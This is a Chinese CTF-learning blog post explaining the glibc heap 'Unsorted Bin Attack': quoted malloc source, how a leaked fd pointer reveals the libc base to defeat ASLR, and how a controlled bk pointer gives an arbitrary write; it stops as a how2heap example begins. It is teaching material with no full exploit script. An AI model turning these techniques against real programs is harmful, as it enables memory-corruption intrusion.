

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/sakura.png">
  <link rel="icon" href="/img/sakura.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="花時雨">
  <meta name="keywords" content="">
  
    <meta name="description" content="Description Unsorted Bin Attack，顾名思义，该攻击与 Glibc 堆管理中的的 Unsorted Bin 的机制紧密相关。 Unsorted Bin Attack 被利用的前提是控制 Unsorted Bin Chunk 的 bk 指针。 Unsorted Bin Attack 可以达到的效果是实现修改任意地址值为一个较大的数值。  回顾Unsorted Bin的基本">
<meta property="og:type" content="article">
<meta property="og:title" content="花与堆之Unsorted Bin Attack">
<meta property="og:url" content="https://rainie017.github.io/2026/04/06/unsortedbin-attack/index.html">
<meta property="og:site_name" content="花時雨的流水账">
<meta property="og:description" content="Description Unsorted Bin Attack，顾名思义，该攻击与 Glibc 堆管理中的的 Unsorted Bin 的机制紧密相关。 Unsorted Bin Attack 被利用的前提是控制 Unsorted Bin Chunk 的 bk 指针。 Unsorted Bin Attack 可以达到的效果是实现修改任意地址值为一个较大的数值。  回顾Unsorted Bin的基本">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/figure/unsortedbins-struct.jpg">
<meta property="og:image" content="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/figure/malloc-trim-ida.png">
<meta property="og:image" content="https://rainie017.github.io/images/unsortedbin-attack/1.png">
<meta property="og:image" content="https://rainie017.github.io/images/unsortedbin-attack/2.png">
<meta property="og:image" content="https://rainie017.github.io/images/unsortedbin-attack/3.png">
<meta property="og:image" content="https://rainie017.github.io/images/unsortedbin-attack/4.png">
<meta property="article:published_time" content="2026-04-06T02:54:10.000Z">
<meta property="article:modified_time" content="2026-04-06T06:16:13.201Z">
<meta property="article:author" content="花時雨">
<meta property="article:tag" content="Pwn">
<meta property="article:tag" content="Heap">
<meta property="article:tag" content="Unsorted Bin Attack">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/figure/unsortedbins-struct.jpg">
  
  
  
  <title>花与堆之Unsorted Bin Attack - 花時雨的流水账</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="https://cdn.staticfile.org/lxgw-wenkai-screen-webfont/1.7.0/style.min.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"rainie017.github.io","root":"/","version":"1.9.9","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"expand_all":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"openkounter":{"server_url":"https://open-kounter.mintimate.cn","path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>花時雨的流水账</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content (desktop) -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

<!-- Mobile grid menu overlay -->
<div id="mobile-grid-menu" class="d-lg-none">
  <div class="mobile-grid-menu-inner">
    <div class="container">
      <div class="row">
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-home-fill"></i>
                  <span>首页</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/archives/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-archive-fill"></i>
                  <span>归档</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/categories/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-category-fill"></i>
                  <span>分类</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/tags/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-tags-fill"></i>
                  <span>标签</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/about/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-user-fill"></i>
                  <span>关于</span>
                </div>
              </a>
            </div>
          
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-search-btn">
            <a href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <div class="mobile-grid-item">
                <i class="iconfont icon-search"></i>
                <span>搜索</span>
              </div>
            </a>
          </div>
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-color-toggle-btn"
               data-label-light="开灯"
               data-label-dark="关灯">
            <a href="javascript:;" aria-label="Color Toggle">
              <div class="mobile-grid-item">
                <i class="iconfont icon-dark" id="mobile-color-toggle-icon"></i>
                <span id="mobile-color-toggle-label">关灯</span>
              </div>
            </a>
          </div>
        
      </div>
    </div>
  </div>
</div>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/background.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="花与堆之Unsorted Bin Attack"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-04-06 10:54" pubdate>
          2026年4月6日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          16k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          130 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>



</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">花与堆之Unsorted Bin Attack</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="Description"><a href="#Description" class="headerlink" title="Description"></a>Description</h2><ul>
<li>Unsorted Bin Attack，顾名思义，该攻击与 Glibc 堆管理中的的 Unsorted Bin 的机制紧密相关。</li>
<li>Unsorted Bin Attack 被利用的前提是控制 Unsorted Bin Chunk 的 bk 指针。</li>
<li>Unsorted Bin Attack 可以达到的效果是实现修改任意地址值为一个较大的数值。</li>
</ul>
<h3 id="回顾"><a href="#回顾" class="headerlink" title="回顾"></a>回顾</h3><h4 id="Unsorted-Bin的基本来源"><a href="#Unsorted-Bin的基本来源" class="headerlink" title="Unsorted Bin的基本来源"></a>Unsorted Bin的基本来源</h4><ol>
<li>当一个较大的 chunk 被分割成两半后，如果剩下的部分大于 MINSIZE，就会被放到 unsorted bin 中。</li>
<li>释放一个不属于 fast bin 的 chunk，并且该 chunk 不和 top chunk 紧邻时，该 chunk 会被首先放到 unsorted bin 中。关于 top chunk 的解释，请参考下面的介绍。</li>
<li>当进行 malloc_consolidate 时，可能会把合并后的 chunk 放到 unsorted bin 中，如果不是和 top chunk 近邻的话。</li>
</ol>
<h4 id="基本使用情况"><a href="#基本使用情况" class="headerlink" title="基本使用情况"></a>基本使用情况</h4><ol>
<li>Unsorted Bin 在使用的过程中遍历顺序是 FIFO (First in first out)，<strong>即插入的时候插入到 unsorted bin 的头部，取出的时候从链表尾获取</strong>。</li>
<li>在程序 malloc 时，如果在 fastbin，small bin 中找不到对应大小的 chunk，就会尝试从 Unsorted Bin 中寻找 chunk。如果取出来的 chunk 大小刚好满足，就会直接返回给用户，否则就会把这些 chunk 分别插入到对应的 bin 中。</li>
</ol>
<h4 id="深入看看unsorted-bin实现"><a href="#深入看看unsorted-bin实现" class="headerlink" title="深入看看unsorted bin实现"></a>深入看看unsorted bin实现</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">while</span> ((victim = unsorted_chunks (av)-&gt;bk) != unsorted_chunks (av))<br>        &#123;<br>          bck = victim-&gt;bk;<br>          <span class="hljs-comment">//size check</span><br>          <span class="hljs-keyword">if</span> (__builtin_expect (victim-&gt;size &lt;= <span class="hljs-number">2</span> * SIZE_SZ, <span class="hljs-number">0</span>)<br>              || __builtin_expect (victim-&gt;size &gt; av-&gt;system_mem, <span class="hljs-number">0</span>))<br>            malloc_printerr (check_action, <span class="hljs-string">&quot;malloc(): memory corruption&quot;</span>,<br>                             chunk2mem (victim), av);<br>          size = chunksize (victim);<br><br>          <span class="hljs-comment">/*</span><br><span class="hljs-comment">             If a small request, try to use last remainder if it is the</span><br><span class="hljs-comment">             only chunk in unsorted bin.  This helps promote locality for</span><br><span class="hljs-comment">             runs of consecutive small requests. This is the only</span><br><span class="hljs-comment">             exception to best-fit, and applies only when there is</span><br><span class="hljs-comment">             no exact fit for a small chunk.</span><br><span class="hljs-comment">           */</span><br>          <span class="hljs-comment">//last remainder first</span><br>          <span class="hljs-keyword">if</span> (in_smallbin_range (nb) &amp;&amp;<br>              bck == unsorted_chunks (av) &amp;&amp;<br>              victim == av-&gt;last_remainder &amp;&amp;<br>              (<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>) (size) &gt; (<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>) (nb + MINSIZE))<br>            &#123;<br>              <span class="hljs-comment">/* split and reattach remainder */</span><br>              remainder_size = size - nb;<br>              remainder = chunk_at_offset (victim, nb);<br>              <span class="hljs-comment">//cut and put the remained part back to unsorted list</span><br>              unsorted_chunks (av)-&gt;bk = unsorted_chunks (av)-&gt;fd = remainder;<br>              av-&gt;last_remainder = remainder;<br>              remainder-&gt;bk = remainder-&gt;fd = unsorted_chunks (av);<br>              <span class="hljs-keyword">if</span> (!in_smallbin_range (remainder_size))<br>                &#123;<br>                  remainder-&gt;fd_nextsize = <span class="hljs-literal">NULL</span>;<br>                  remainder-&gt;bk_nextsize = <span class="hljs-literal">NULL</span>;<br>                &#125;<br><br>              set_head (victim, nb | PREV_INUSE |<br>                        (av != &amp;main_arena ? NON_MAIN_ARENA : <span class="hljs-number">0</span>));<br>              set_head (remainder, remainder_size | PREV_INUSE);<br>              set_foot (remainder, remainder_size);<br><br>              check_malloced_chunk (av, victim, nb);<br>              <span class="hljs-type">void</span> *p = chunk2mem (victim);<br>              alloc_perturb (p, bytes);<br>              <span class="hljs-comment">//return to user</span><br>              <span class="hljs-keyword">return</span> p;<br>            &#125;<br><br>          <span class="hljs-comment">/* remove from unsorted list */</span><br>          <span class="hljs-comment">//unsorted bin attack</span><br>          unsorted_chunks (av)-&gt;bk = bck;<br>          bck-&gt;fd = unsorted_chunks (av);<br><br>          <span class="hljs-comment">/* Take now instead of binning if exact fit */</span><br><br>          <span class="hljs-keyword">if</span> (size == nb)<br>            &#123;<br>              set_inuse_bit_at_offset (victim, size);<br>              <span class="hljs-keyword">if</span> (av != &amp;main_arena)<br>                victim-&gt;size |= NON_MAIN_ARENA;<br>              check_malloced_chunk (av, victim, nb);<br>              <span class="hljs-type">void</span> *p = chunk2mem (victim);<br>              alloc_perturb (p, bytes);<br>              <span class="hljs-keyword">return</span> p;<br>            &#125;<br><br>          <span class="hljs-comment">/* place chunk in bin */</span><br><br>          <span class="hljs-keyword">if</span> (in_smallbin_range (size))<br>            &#123;<br>              victim_index = smallbin_index (size);<br>              bck = bin_at (av, victim_index);<br>              fwd = bck-&gt;fd;<br>            &#125;<br>          <span class="hljs-keyword">else</span><br>            &#123;<br>              victim_index = largebin_index (size);<br>              bck = bin_at (av, victim_index);<br>              fwd = bck-&gt;fd;<br><br>              <span class="hljs-comment">/* maintain large bins in sorted order */</span><br>              <span class="hljs-keyword">if</span> (fwd != bck)<br>                &#123;<br>                  <span class="hljs-comment">/* Or with inuse bit to speed comparisons */</span><br>                  size |= PREV_INUSE;<br>                  <span class="hljs-comment">/* if smaller than smallest, bypass loop below */</span><br>                  assert ((bck-&gt;bk-&gt;size &amp; NON_MAIN_ARENA) == <span class="hljs-number">0</span>);<br>                  <span class="hljs-keyword">if</span> ((<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>) (size) &lt; (<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>) (bck-&gt;bk-&gt;size))<br>                    &#123;<br>                      fwd = bck;<br>                      bck = bck-&gt;bk;<br><br>                      victim-&gt;fd_nextsize = fwd-&gt;fd;<br>                      victim-&gt;bk_nextsize = fwd-&gt;fd-&gt;bk_nextsize;<br>                      fwd-&gt;fd-&gt;bk_nextsize = victim-&gt;bk_nextsize-&gt;fd_nextsize = victim;<br>                    &#125;<br>                  <span class="hljs-keyword">else</span><br>                    &#123;<br>                      assert ((fwd-&gt;size &amp; NON_MAIN_ARENA) == <span class="hljs-number">0</span>);<br>                      <span class="hljs-keyword">while</span> ((<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>) size &lt; fwd-&gt;size)<br>                        &#123;<br>                          fwd = fwd-&gt;fd_nextsize;<br>                          assert ((fwd-&gt;size &amp; NON_MAIN_ARENA) == <span class="hljs-number">0</span>);<br>                        &#125;<br><br>                      <span class="hljs-keyword">if</span> ((<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>) size == (<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>) fwd-&gt;size)<br>                        <span class="hljs-comment">/* Always insert in the second position.  */</span><br>                        fwd = fwd-&gt;fd;<br>                      <span class="hljs-keyword">else</span><br>                        &#123;<br>                          victim-&gt;fd_nextsize = fwd;<br>                          victim-&gt;bk_nextsize = fwd-&gt;bk_nextsize;<br>                          fwd-&gt;bk_nextsize = victim;<br>                          victim-&gt;bk_nextsize-&gt;fd_nextsize = victim;<br>                        &#125;<br>                      bck = fwd-&gt;bk;<br>                    &#125;<br>                &#125;<br>              <span class="hljs-keyword">else</span><br>                victim-&gt;fd_nextsize = victim-&gt;bk_nextsize = victim;<br>            &#125;<br><br>          mark_bin (av, victim_index);<br>          victim-&gt;bk = bck;<br>          victim-&gt;fd = fwd;<br>          fwd-&gt;bk = victim;<br>          bck-&gt;fd = victim;<br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> MAX_ITERS 10000</span><br>          <span class="hljs-keyword">if</span> (++iters &gt;= MAX_ITERS)<br>            <span class="hljs-keyword">break</span>;<br>        &#125;<br></code></pre></td></tr></table></figure>

<blockquote>
<p><code>unsorted bin</code> 也是以链表的方式进行组织的，和 <code>fast bin</code> 不同的是其分配方式是 FIFO，即一个chunk放入 <code>unsorted bin</code>链时将该堆块插入链表头，而从这个链取堆块的时候是从尾部开始的，因此 <code>unsorted bin</code> <strong>遍历堆块的时候使用的是bk指针</strong>。</p>
</blockquote>
<ol>
<li><p>首先取出链表尾部的chunk记作 <code>victim</code> ，倒数第二个chunk记作 <code>bck</code>，并对 <code>victm</code> 的size位进行检查，这里的约束比较宽松：计算出chunk的大小后，假如我们申请的chunk属于 <code>small bin</code> 范围，且 <code>last remainder</code> 是 <code>unsorted bin</code> 中的唯一一个chunk时，就优先使用这个块，如果该块满足条件则对其进行切割和脱链操作。</p>
</li>
<li><p>如果上述条件不满足，则将 <code>victim</code> 从链中取出之后放到合适的链中或返回给用户。其中 <code>unsorted_chunks (av)-&gt;bk = bck;bck-&gt;fd = unsorted_chunks (av);</code> 是 <code>unsorted bin attack</code> 产生的原因：一旦我们绕过之前的检查到达这里，在可以控制 <code>victim-&gt;bk</code> 即 <code>bck</code> 的情况下我们可以往 <code>bck-&gt;fd写入unsorted_chunks(av)即*(bck+0x10)=unsorted(av)</code>。</p>
</li>
<li><p>继续走，下面一个代码块是指如果我们请求的 <code>nb</code> 同 <code>victim</code> 的大小恰好吻合，就直接返回这个块给用户。</p>
</li>
<li><p>如果之前的条件都不满足，意味着目前的 <code>victim</code> 不能满足用户的需求，需要根据其size放入 <code>small bin</code> 或<code>large bin</code> 的链，其中在后者实现中存在large bin attack，由于同本文无关就不再进一步展开，最后是unlink将victim彻底脱链。</p>
</li>
</ol>
<h2 id="Unsorted-Bin-Leak"><a href="#Unsorted-Bin-Leak" class="headerlink" title="Unsorted Bin Leak"></a>Unsorted Bin Leak</h2><h3 id="Unsorted-Bin的结构"><a href="#Unsorted-Bin的结构" class="headerlink" title="Unsorted Bin的结构"></a>Unsorted Bin的结构</h3><p>经过上面的代码解读后，我们了解到 Unsorted Bin 在管理时为循环双向链表，若 Unsorted Bin 中有两个 bin，那么该链表结构如下：<br><img src="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/figure/unsortedbins-struct.jpg" srcset="/img/loading.gif" lazyload alt="unsortedbins-struct"></p>
<h3 id="Leak原理"><a href="#Leak原理" class="headerlink" title="Leak原理"></a>Leak原理</h3><blockquote>
<p>如果我们可以把正确的 fd 指针 leak 出来，就可以获得一个与 main_arena 有固定偏移的地址，这个偏移可以通过调试得出。而main_arena 是一个 struct malloc_state 类型的全局变量，是 ptmalloc 管理主分配区的唯一实例。说到全局变量，立马可以想到他会被分配在 .data 或者 .bss 等段上，那么如果我们有进程所使用的 libc 的 .so 文件的话，我们就可以获得 main_arena 与 libc 基地址的偏移，实现对 ASLR 的绕过。</p>
</blockquote>
<h4 id="通过-malloc-trim-函数得出"><a href="#通过-malloc-trim-函数得出" class="headerlink" title="通过 malloc_trim 函数得出"></a>通过 <strong>malloc_trim</strong> 函数得出</h4><p>在 malloc.c 中有如下代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">int</span><br>__malloc_trim (<span class="hljs-type">size_t</span> s)<br>&#123;<br>  <span class="hljs-type">int</span> result = <span class="hljs-number">0</span>;<br><br>  <span class="hljs-keyword">if</span> (__malloc_initialized &lt; <span class="hljs-number">0</span>)<br>    ptmalloc_init ();<br><br>  mstate ar_ptr = &amp;main_arena;<span class="hljs-comment">//&lt;=here!</span><br>  <span class="hljs-keyword">do</span><br>    &#123;<br>      __libc_lock_lock (ar_ptr-&gt;mutex);<br>      result |= mtrim (ar_ptr, s);<br>      __libc_lock_unlock (ar_ptr-&gt;mutex);<br><br>      ar_ptr = ar_ptr-&gt;next;<br>    &#125;<br>  <span class="hljs-keyword">while</span> (ar_ptr != &amp;main_arena);<br><br>  <span class="hljs-keyword">return</span> result;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>注意到 <code>mstate ar_ptr = &amp;main_arena;</code> 这里对 <code>main_arena</code> 进行了访问，所以我们可以通过IDA等工具分析出偏移：<br><img src="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/figure/malloc-trim-ida.png" srcset="/img/loading.gif" lazyload></p>
<p>如图所示将 <code>.so</code> 文件放入IDA中，找到 <code>malloc_trim</code> 函数就可以获得偏移了。</p>
<h4 id="通过-malloc-hook-直接算出"><a href="#通过-malloc-hook-直接算出" class="headerlink" title="通过 __malloc_hook 直接算出"></a>通过 __malloc_hook 直接算出</h4><p>在前文的 Fast Bin Attack 学习中，我们了解到：<code>main_arena</code> 和 <code>__malloc_hook</code> 的地址差是 0x10，而大多数libc都可以直接查出 <code>__malloc_hook</code> 地址，这样就可以大幅减少工作量，以pwntools为例：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">main_arena_offset = ELF(<span class="hljs-string">&quot;libc.so.6&quot;</span>).symbols[<span class="hljs-string">&quot;__malloc_hook&quot;</span>] + <span class="hljs-number">0x10</span><br></code></pre></td></tr></table></figure>
<p>这样就可以获得 <code>main_arena</code> 与基地址的偏移了。</p>
<h3 id="实现-Leak-的方法"><a href="#实现-Leak-的方法" class="headerlink" title="实现 Leak 的方法"></a>实现 Leak 的方法</h3><blockquote>
<p>一般来说，要实现 leak，需要有 UAF，将一个 chunk 放入 Unsorted Bin 中后再打出其 fd。一般的笔记管理题都会有 show 的功能，对处于链表尾的节点 show 就可以获得 libc 的基地址了。</p>
</blockquote>
<blockquote>
<p>特别的，CTF 中的利用，堆往往是刚刚初始化的，所以 Unsorted Bin 一般都是干净的，当里面只存在一个 bin 的时候，该 bin 的 fd 和 bk 都会指向 main_arena 中。</p>
</blockquote>
<blockquote>
<p>另外，如果我们无法做到访问链表尾，但是可以访问链表头，那么在 32 位的环境下，对链表头进行 printf 等往往可以把 fd 和 bk 一起输出出来，这个时候同样可以实现有效的 leak。然而在 64 位下，由于高地址往往为 <code>\x00</code>，很多输出函数会被截断，这个时候可能就难以实现有效 leak。</p>
</blockquote>
<h2 id="Unsorted-Bin-Attack-原理"><a href="#Unsorted-Bin-Attack-原理" class="headerlink" title="Unsorted Bin Attack 原理"></a>Unsorted Bin Attack 原理</h2><p>在 <a href="code.woboq.org/userspace/glibc/malloc/malloc.c.html">glibc&#x2F;malloc&#x2F;malloc.c</a>中的 <code>_int_malloc</code> 中有这样的一段代码，当将一个 unsorted bin 取出的时候，会将 <code>bck-&gt;fd</code> 的位置写入本 Unsorted Bin 的位置。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">/* remove from unsorted list */</span><br><span class="hljs-keyword">if</span> (__glibc_unlikely (bck-&gt;fd != victim))<br>  malloc_printerr (<span class="hljs-string">&quot;malloc(): corrupted unsorted chunks 3&quot;</span>);<br>unsorted_chunks (av)-&gt;bk = bck;<br>bck-&gt;fd = unsorted_chunks (av);<br></code></pre></td></tr></table></figure>
<p>关注后两行：unsorted_chunk的bk指针指向的是它后一个被释放的chunk的块地址（bck），后一个被释放的chunk的fd指针指向的是unsorted_chunk的块地址。如果我们能够控制unsorted_chunk的bk，那么就意味着可以将unsorted_chunks (av)，即unsorted_chunk的块地址写到任意可写地址内。</p>
<h3 id="不深入也不知道浅不浅出"><a href="#不深入也不知道浅不浅出" class="headerlink" title="不深入也不知道浅不浅出"></a>不深入也不知道浅不浅出</h3><p>这里以how2heap为例子</p>
